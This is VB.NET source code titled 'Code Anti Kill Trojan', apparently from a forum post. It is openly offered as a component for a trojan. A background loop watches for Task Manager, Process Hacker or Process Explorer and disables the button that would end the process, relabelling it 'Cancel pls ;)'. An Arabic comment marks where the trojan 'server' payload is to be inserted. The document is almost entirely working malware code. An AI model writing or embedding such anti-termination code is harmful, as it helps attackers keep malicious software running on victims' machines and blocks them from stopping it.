Code Anti Kill Trojan

1. Public Class Form1
2. Dim c As New AntiTaskManager
3. Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
4. End
5. End Sub
6. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
7. Control.CheckForIllegalCrossThreadCalls = False
8. Dim t As New Threading.Thread(AddressOf c.protect)
9. t.Start()
10. هنا ضع الكود للسيرفر
11. End Sub
12. End Class
13. Public Class AntiTaskManager
14.  
15. <Runtime.InteropServices.DllImport("user32.dll")> _
16. Private Shared Function EnableWindow(ByVal hWnd As IntPtr, ByVal bEnable As Boolean) As Boolean
17. End Function
18. Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As _
19. IntPtr, ByRef lpdwProcessID As Integer) As Integer
20. Private Declare Function GetForegroundWindow Lib "user32.dll" () As IntPtr
21. Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As _
22. Integer, ByVal lpClassName As String, ByVal nMaxCount As Integer) As Integer
23. Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal _
24. hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As String) As Integer
25. Private Declare Auto Function GetWindowText Lib "user32.dll" (ByVal hwnd As Int32, _
26. ByVal lpString As System.Text.StringBuilder, ByVal cch As Int32) As Int32
27. Private Declare Auto Function GetWindowTextLength Lib "user32.dll" (ByVal hwnd As Int32) As Int32
28. Private Delegate Function EnumWindProc(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
29. Private Delegate Function EnumChildWindProc(ByVal hWnd As Int32, ByVal _
30. lParam As Int32) As Boolean
31. Private Declare Function EnumChildWindows Lib "user32" (ByVal hWnd As IntPtr, _
32. ByVal lpEnumFunc As EnumWindProc, ByRef lParam As IntPtr) As Int32
33. Private Function EnumChild(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
34. CLD.Add(hWnd)
35. Return True
36. End Function
37. Public Sub protect()
38. While True
39. Threading.Thread.Sleep(200)
40. Dim hwd = GetForegroundWindow
41. If hwd.ToInt32 = 0 Then Continue While
42. Dim id As Integer = 0
43. GetWindowThreadProcessId(hwd, id)
44. If id > 0 Then
45. Dim Title As String = ""
46. Dim text_len As Integer = GetWindowTextLength(hwd)
47. If text_len = 0 Then
48. Title = ""
49. Else
50. Dim sb As New System.Text.StringBuilder(text_len + 1)
51. Dim ret = GetWindowText(hwd, sb, sb.Capacity)
52. If ret = 0 Then
53. Title = ""
54. Else
55. Title = sb.ToString
56. End If
57. End If
58. Dim p As Process = Process.GetProcessById(id)
59. If p.ProcessName.ToLower = "taskmgr" Or p.ProcessName.ToLower _
60. = "processhacker" Or Title.ToLower = "process explorer" Then
61. Dim button As New List(Of IntPtr)
62. Dim statics As Integer = 0
63. For Each x As IntPtr In GetChild(hwd)
64. Dim className As String = Space(200)
65. Dim ln As Integer = GetClassName(x, className, 200)
66. className = className.Remove(ln, 200 - ln)
67. If className.ToLower = "button" Then
68. button.Add(x)
69. End If
70. If className.ToLower = "static" Or className.ToLower _
71. = "directuihwnd" Then
72. statics += 1
73. End If
74. Next
75. If button.Count = 2 And (statics = 2 Or statics = 1) Then
76. EnableWindow(button(0), False)
77. SendMessage(button(0), &HC, 0, "Cancel pls ;)")
78. End If
79. End If
80. End If
81. End While
82. End Sub
83. Private CLD As New List(Of IntPtr)
84. Private Function GetChild(ByVal hwd As IntPtr) As IntPtr()
85. SyncLock Me
86. CLD.Clear()
87. EnumChildWindows(hwd, New EnumWindProc(AddressOf EnumChild), 0)
88. Return CLD.ToArray
89. End SyncLock
90. End Function
91. End Class